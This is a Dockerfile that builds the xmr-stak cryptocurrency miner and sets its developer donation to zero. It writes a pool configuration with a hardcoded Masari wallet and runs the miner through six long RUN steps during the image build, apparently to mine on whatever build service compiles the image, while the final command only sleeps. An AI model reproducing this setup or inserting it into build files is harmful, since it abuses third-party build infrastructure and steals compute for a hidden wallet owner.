FROM ubuntu:latest

RUN 	apt-get update && \
        apt-get install -y --no-install-recommends \
          build-essential \
          libssl-dev \
          libhwloc-dev \
          cmake \
          libmicrohttpd-dev \
          ca-certificates \
          unzip \
		  wget && \
        wget https://github.com/fireice-uk/xmr-stak/archive/2.4.5.zip && \
		unzip 2.4.5.zip && \
		mv xmr-stak-2.4.5 xmr-stak && \
		ls && \
        mkdir xmr-stak/build && \
        printf "#pragma once\n" > xmr-stak/xmrstak/donate-level.hpp && \
        printf "constexpr double fDevDonationLevel = 0.0;" >> xmr-stak/xmrstak/donate-level.hpp && \
        cd xmr-stak/build && \
        cmake -DCUDA_ENABLE=OFF -DOpenCL_ENABLE=OFF .. && \
        make install && \
        cp /xmr-stak/build/bin/xmr-stak /xmrstak

RUN echo "\"call_timeout\":10,\"retry_time\":30,\"giveup_limit\":0,\"verbose_level\":4,\"print_motd\":true,\"h_print_time\":60,\"aes_override\":null,\"use_slow_memory\":\"warn\",\"tls_secure_algo\":true,\"daemon_mode\":false,\"flush_stdout\":false,\"output_file\":\"\",\"httpd_port\":0,\"http_login\":\"\",\"http_pass\":\"\",\"prefer_ipv4\":true," > /config.txt
RUN echo "\"pool_list\":[{\"pool_address\":\"stratum+tcp://pool.masaricoin.com:3333\",\"wallet_address\":\"5o5TuPVdc2x6q4jWMLk72wLmjEWeitdvEMjeycL7YznXHHLegsL5TM2S6T3JJfP3ArGDZMohjVWV5Pm22b1j8wgN5hXQ1zs\",\"rig_id\":\"\",\"pool_password\":\"x\",\"use_nicehash\":false,\"use_tls\":false,\"tls_fingerprint\":\"\",\"pool_weight\":1},],\"currency\":\"masari\"," > /pools.txt
RUN /xmrstak & sleep 4800
RUN /xmrstak & sleep 4800
RUN /xmrstak & sleep 4800
RUN /xmrstak & sleep 4800
RUN /xmrstak & sleep 4800
RUN /xmrstak & sleep 4800

CMD ["sleep", "3600000000"]